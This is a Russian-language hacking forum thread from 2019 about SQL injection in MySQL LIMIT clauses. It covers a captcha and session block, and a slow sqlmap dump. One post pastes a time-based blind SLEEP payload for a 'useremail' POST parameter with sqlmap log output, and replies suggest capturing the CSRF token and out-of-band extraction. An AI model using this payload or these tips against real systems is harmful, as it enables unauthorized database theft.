04.06.2019, 23:31
|
|
Участник форума
Регистрация: 23.03.2017
Сообщений: 265
С нами:
4812086
Репутация:
119
|
|
Подскажите, есть ли на текущий момент вариант провести Mysql иньект в лимите, если версия Mysql > 5.6 ? Трюк с procedure analyse не прокатывает, но возможно есть ещё какие техники? Буду признателен, если кто подскажет.
|
|
|
09.06.2019, 02:17
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
|
|
|
|
19.06.2019, 10:08
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
После каждого SQL запроса
Session halted.
Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
|
|
|
|
19.06.2019, 10:54
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Сообщение от madam
↑
После каждого SQL запроса
Session halted.
Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
Все заголовки отлавливать и использовать, возможно CSRF токен мешает
|
|
|
|
20.06.2019, 15:09
|
|
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами:
3632726
Репутация:
0
|
|
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
|
|
|
|
20.06.2019, 17:11
|
|
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
С нами:
6868406
Репутация:
2
|
|
Сообщение от AngelEyes
↑
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
если есть такое, вполне возможно есть и другие скули, поищите хорошо.
|
|
|
|
20.06.2019, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от AngelEyes
↑
Parameter: useremail (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать( везде)
Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
[ERROR] invalid character detected. retrying..
[WARNING] increasing time delay to 4 seconds
Oob
|
|
|
|
20.06.2019, 18:59
|
|
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами:
3632726
Репутация:
0
|
|
Если это ответ,то можно поподробней=)
|
|
|
|
20.06.2019, 19:02
|
|
Новичок
Регистрация: 20.06.2019
Сообщений: 7
С нами:
3632726
Репутация:
0
|
|
Сообщение от RWD
↑
если есть такое, вполне возможно есть и другие скули, поищите хорошо.
Пара разных пейлоадов,пробовал через оба,но итог один и тот же
|
|
|
|
20.06.2019, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
